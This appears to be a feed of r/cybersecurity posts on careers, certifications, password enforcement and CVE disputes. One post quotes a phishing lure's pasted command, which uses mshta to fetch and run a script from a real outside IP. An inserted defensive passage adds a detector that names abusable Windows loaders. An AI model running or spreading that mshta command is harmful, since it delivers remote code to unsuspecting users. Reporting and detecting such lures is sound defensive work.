cybersecurity


This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.

101
The original post: /r/cybersecurity by /u/chs0c on 2024-11-19 14:21:41.

I have nearly 3 years in this industry now, and I enjoy it, but wow. Do other professions have this much cock-stroking?

All I ever read is that you need a passion, a drive, you need to live breathe eat drink cyber security in order to succeed in it (or even work in it). I've always seen it recommended that you have a home lab, learn new tools, learn new techniques, study for certifications AND work in security, all at once. Don't get me started on other security people on places like LinkedIn, the amount of time these people dedicate to security is absurd.

Cyber security is an industry in which I work, to make money, to live life and make ends meet. The idea of doing MORE security outside of work hours is ludicrous to me.

And people wonder why there's a huge burnout rate?

102
The original post: /r/cybersecurity by /u/wound_dear on 2024-11-19 14:15:22.

My hotel email recently got an interesting phishing attempt. It contained a link spoofed to look like a genuine Booking.com link. When loading the site, a fake reCaptcha box loads with instructions to open the Run program on Windows, hit CTRL+V, and hit enter. The clipboard is loaded with this command:

mshta http://185.147.124.40/Capcha.html # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3781''

I thought this was an interesting attack. The real interesting thing, though, is the script loaded in on the IP's "Capcha.html" file, which I've put in an (unlisted) pastebin here.

I can recognize this is obfuscated code, but I have no idea how to crack this any further. Also, I feel like having an unshielded IP address is kind of a liability, no?
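From a defender's side, the useful question is how the pasted command shows up in endpoint telemetry. The following is an added example, not part of the post: a small detector for the "paste into the Run box" lure described above, run over constructed records shaped like Sysmon process-creation (Event ID 1) fields. Field names follow Sysmon; the users, paths and TEST-NET address are made up.

```javascript
// Added example, not from the post: flags built-in Windows binaries that are
// launched interactively with a remote URL on the command line, which is the
// process-creation footprint of the "open Run, Ctrl+V, Enter" lure.
// Field names follow Sysmon Event ID 1; all sample values are constructed.

const REMOTE_URL = /\bhttps?:\/\/\S+/i;
// Built-in Windows binaries commonly abused to fetch and run remote content.
const REMOTE_LOADERS = new Set(["mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe"]);

function baseName(p) {
  return String(p || "").split(/[\\/]/).pop().toLowerCase();
}

// Returns a finding for a suspicious record, or null when nothing matches.
function inspectProcessEvent(ev) {
  const image = baseName(ev.Image);
  const cmd = ev.CommandLine || "";
  if (!REMOTE_LOADERS.has(image)) return null;
  const url = cmd.match(REMOTE_URL);
  if (!url) return null;
  const reasons = [`${image} launched with remote URL ${url[0]}`];
  // explorer.exe as parent means an interactive launch (Run dialog or a
  // double-click), which is exactly how this lure gets its command executed.
  if (baseName(ev.ParentImage) === "explorer.exe") reasons.push("interactive parent explorer.exe");
  // Text after "#" only pads the Run box with reassuring words; the URL still loads.
  if (/\s#\s*\S/.test(cmd)) reasons.push("decoy text appended after the URL");
  return { user: ev.User, image, severity: reasons.length >= 2 ? "high" : "medium", reasons };
}

function scanEvents(events) {
  return events.map(inspectProcessEvent).filter(Boolean);
}

// Constructed sample records (not real telemetry).
const SAMPLE_EVENTS = [
  { User: "HOTEL\\frontdesk", Image: "C:\\Windows\\System32\\mshta.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "mshta http://203.0.113.5/Capcha.html # I am not a robot - reCAPTCHA Verification ID: 1234" },
  { User: "HOTEL\\frontdesk", Image: "C:\\Windows\\System32\\mshta.exe",
    ParentImage: "C:\\Program Files\\Vendor\\installer.exe",
    CommandLine: "mshta \"C:\\Program Files\\Vendor\\setup.hta\"" },
  { User: "HOTEL\\admin", Image: "C:\\Windows\\System32\\notepad.exe",
    ParentImage: "C:\\Windows\\explorer.exe", CommandLine: "notepad.exe notes.txt" },
];
```

Only the first record is flagged; a local .hta run by an installer and an ordinary notepad launch are left alone.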

103
The original post: /r/cybersecurity by /u/rustybladez23 on 2024-11-19 12:56:04.

Hi everyone. I want to build a career in cybersecurity (offensive side of things). I'm currently in my 3rd year in Uni. So I'm thinking of prepping from now so that I can get job ready after graduation.

So I'm kinda in a dilemma. I've been following The Cyber Mentor for some time and honestly he was my biggest inspiration for getting interested in cyber. I've watched their free content and liked it. Currently they are running a sale.

On the other hand, there's TryHackMe, which is a great platform and fun to learn from (I did their Advent of Cyber last year, liked it too).

I'm planning to get an annual subscription of either of these. Both are $100+ (THM is a bit cheaper I think). For a student in a 3rd world country, that's a big investment.

So which do you think would be money's worth? Or should I stick to free resources for now since there are tons out there (and good quality). What would be your suggestion?

Thanks in advance.

104
The original post: /r/cybersecurity by /u/arqf_ on 2024-11-19 12:51:44.
105
The original post: /r/cybersecurity by /u/Free_Trial_Of_Life on 2024-11-19 12:25:47.

Hello folks, I need advice from guys with experience of obtaining CVE. I am facing issues while getting a CVE for my finding. It gets rejected for unknown reasons. Let me describe the situation:

  • Software is an NPM library X that offers utility methods for abstract usage of another software Y. Library X was developed by an independent person, not tied to the vendor of Y. The library X has around 150k weekly downloads, so it's prevalently used.

  • The library exports a function to process certain files and perform operations on them. The vulnerability is a command injection in the filename that is passed to this function. The filename is inserted into a CLI command for running Y and can be escaped to inject malicious commands. I built a sample webapp and showcased PoC exploitation.

  • I shared this finding with both vendor Y and the developer of library X, and got successful responses from each. The developer of X even invited me to collaborate in fixing this vuln. But he ghosted me afterwards and didn't get back to my messages. So the vulnerability remained unresolved.

After a while I applied for a CVE record both in mitre and vuldb but both rejected my request. VulDB's response:

* Unfortunately, we are not able to handle this issue. Please contact MITRE at https://cveform.mitre.org/

MITRE's response:

There is no CVE ID associated with the X NPM library for this. The existence of exported functions does not mean that the library is intended to be used in a situation where "a user-controlled filename is passed to X function as it is."

MITRE's response does not make sense in my opinion. A CVE ID does not exist because it's a new finding. My PoC also shows how applications using this library can be exploited to gain RCE. The library cannot guarantee that the filename is not user-controlled.

I am confused. How should I navigate this situation? What am I missing that makes my finding invalid? I would appreciate any kind of help.

106
The original post: /r/cybersecurity by /u/manindrasmack on 2024-11-19 11:18:47.

Hi,

One of my friends got a call from Apple for a pen-testing role. The first round of interviews is HTB. I would like to know if anyone has an idea of what kind of machines we can expect for this role.

https://jobs.apple.com/en-in/details/200558639/penetration-tester-retail-engineering

107
The original post: /r/cybersecurity by /u/cydex0 on 2024-11-19 10:29:56.

Cybersecurity and hiring managers, what do you all think about the PNPT cert in general, and how has your experience been with candidates holding PNPT?

108
The original post: /r/cybersecurity by /u/apoklinon on 2024-11-19 09:52:26.

When I first worked in the industry I always admired people with a lot of reputable certifications. I also fell into the same trap and started to collect them like Pokémon cards.

On the one hand it was the challenge and the thrill, which is a healthy situation, but it was also the peer and HR pressure that sucks big time. Long story short, after a few years in different domains and positions and after interacting with many professionals I realized that the more knowledgeable and skilled someone is, the less they care about being certified for their skills. I have reached the point where now I'm almost biased against people with many certs because I feel like they are trying very hard to cover their experience and skill gap with certs. Super smart and talented professionals I have met couldn't care less for an OffSec cert, while people trying to prove themselves hunt them down like crazy.

Don't get me wrong, I'm not saying everyone that has a lot of certs is not competent enough to do their job, I just believe that a 1h interview speaks more than a CV with all the latest fancy certs. I have seen red teamers that can do APT level stuff and crazy research but they don't even bother to take an OSCP, whereas I have also seen people with CEH, all the CompTIAs and CISA, CISSP having trouble using nmap. I know, I know, these are different domains and different kinds of work so the comparison isn't fair and the certs not relevant, but I'm sure the red teamer could take all these certs without even trying in a week, they just don't care.

What are your thoughts on this? Am I being unfair here? On average, are people with tons of certs actually less skilled?

109
The original post: /r/cybersecurity by /u/peraphon on 2024-11-18 22:53:49.

Hey all,

We use Pentera to do hash cracking of our on-prem AD each week, and I have written a PowerShell script to take the list of users and follow them up every 6 weeks with best practices for creating a passPHRASE rather than a password.

Please note that we never see a user's password - we only ever see the gauged password "strength" (ie GPU effort).

A user has emailed back saying that he would like to decline my request for him to change his password, that he was advised when he changed his password last that it was a good strong password and didn't require changing, and to desist with constant badgering and harassment about changing his password.

On a previous occasion he threatened union involvement when I asked him to change his password, claiming a "constant invasion of privacy" (LOL!)

I've been following this user up since 1 March about crackable passwords - he changed it once but it was still crackable.

So, WWYD with a user who obviously has no regard for infosec or network security?

Thx everyone

110
Job Interview (zerobytes.monster)
The original post: /r/cybersecurity by /u/ooootheysosensitive on 2024-11-19 05:15:39.

I have a job interview tomorrow where I was told to review the following topics, which I feel I have. How would you guys test to make sure you understand the concepts? Are there practice code reviews I can do?

"We want you to be able to identify security flaws via code review and demonstrate deep understanding of the issues found. We want you to be able to explain your approach to code review during the interview, explain the risk of each issue, explain how the issue might get exploited and suggest fixes with practical security and defense-in-depth in mind.

OWASP TOP 10

In depth understanding of core web concepts like SOP (same origin policy) and HTTPS certificate validation

Understanding of web application fundamentals

Cryptography

  • Encryption at rest and in transit
  • Symmetric encryption and its applications
  • Public Key Cryptography and its applications
  • Credentials (password) storage and Hashing"
111
CISA Learning? (zerobytes.monster)
The original post: /r/cybersecurity by /u/Techatronix on 2024-11-19 04:55:58.

I created my account and snooped around a little bit. Looks pretty good. I had an account with FedVTE but I did not use it. How is this supposed to work for CPEs? How did FedVTE work?

Do they auto-report your CPEs? Or do you just download certificate of completion and upload to the certifying body? Also, did FedVTE have cert prep courses? Or was it just more general keeping current with technology?

112
The original post: /r/cybersecurity by /u/BrycenLong6 on 2024-11-19 02:44:55.

I found an exploit for iPhones and I wanted to test it out and see if I can break in. Just wanted to make sure that wouldn’t land me in jail.

113
The original post: /r/cybersecurity by /u/cppnewb on 2024-11-18 23:48:13.

I have 5 YOE as a Software Engineer and about 3 YOE as an Application Security Engineer. Still relatively new in the security space. I have experience in: threat modeling, architecture reviews, secure code reviews, analyzing results from SAST/DAST scans, pentesting, tool development, and providing vulnerability remediation guidance to development teams. In my current team, each AppSecEng is directly responsible for one specific domain. One engineer works with just SAST/DAST, one engineer only does pentests, etc. My domain is threat modeling, but I also have a number of random projects on the side. Writing various automation scripts, configuring an in-app WAF, enabling secrets scanning on various repos, etc. While my coworkers are specialists, I find myself to be a generalist. From a career growth perspective, I wonder if I need to laser focus on one area, or if I can continue doing what I'm doing. FWIW, I'm happy with my work, but want to make sure I'm gaining the necessary skills to get promoted to Senior and beyond.

114
The original post: /r/cybersecurity by /u/J0wad on 2024-11-18 23:06:30.

Hello, I'm a junior in High School and for an assignment for a class I'm supposed to interview someone from the field I want to study (which is Cybersecurity). DM me if you're interested and we'll get talking. Thanks!

115
The original post: /r/cybersecurity by /u/JCTopping on 2024-11-18 21:45:25.
116
The original post: /r/cybersecurity by /u/Jungleexplorer on 2024-11-18 21:37:59.

I understand the dangers that exist, but the problem is, the harder they try to FORCE people to become more secure, the more insecure they make us.

It used to be that you could log in with your username and password. Then, they started requiring you to verify via email in some cases. Today, none of that works in most cases. It does not matter if you know your username, password, and email. None of that will get you back into your account. So why even have them anymore???? If a username, password, and email verification are no longer considered "Secure", why even have them AT ALL?! It makes no freaking sense.

The problem I have with all of this, is that every time they demand you divulge more and more personal information about yourself, in order to "Make Sure it is YOU", that information gets stored in a database somewhere, which will eventually get hacked, and then all that personal identity information will end up on the dark web for crooks to use. You know I am telling the truth. It has happened countless times already. This is the exact reason why usernames, passwords, mother's maiden name, first pet, emails etc, etc, etc, are no longer considered secure.

I just had a website (that I have had an account with for over ten years) refuse to let me access my account unless I provide Biometric verification to them. Are you F*ck**n kidding me!!! Yeah sure, here! Let me give you my fingerprints, iris scan, and DNA so you can get that on file for someone to steal. I told them to go screw themselves.

It has just gotten ridiculous. If in our efforts to keep people secure, we lock them out of their accounts, what is the point?

117
The original post: /r/cybersecurity by /u/Novel_Negotiation224 on 2024-11-18 21:22:38.
118
The original post: /r/cybersecurity by /u/antdude on 2024-11-18 21:20:07.
119
The original post: /r/cybersecurity by /u/anynamewillbegood on 2024-11-18 21:17:25.
120
The original post: /r/cybersecurity by /u/arqf_ on 2024-11-18 21:16:05.
121
The original post: /r/cybersecurity by /u/sasko12 on 2024-11-18 20:52:01.
122
The original post: /r/cybersecurity by /u/arqf_ on 2024-11-18 20:34:57.
123
The original post: /r/cybersecurity by /u/JCTopping on 2024-11-18 20:33:56.
124
The original post: /r/cybersecurity by /u/Comfortable-Bus-88 on 2024-11-18 20:10:57.

Currently in our company (small IT company, <50 employees) we do the training during a meeting where everyone has to participate (max 30 min). Now I will try to make multiple trainings where each module consists of slides, video and questions at the end. We already cover some topics like passwords, phishing, clean desk, physical security (like letting external people in the office etc.) and some additional security topics for the developers, e.g. docker, ssh and so on. I would appreciate some hints on what topics we should definitely cover, and maybe some examples would be nice. All advice is welcome.

125
The original post: /r/cybersecurity by /u/Fit_Presence_7055 on 2024-11-18 19:50:51.

Hey All,

Since mail rules are one vector of bad actor persistence, do you guys use PowerShell to find suspicious rules? If so, do you mind sharing what you are doing and looking for?
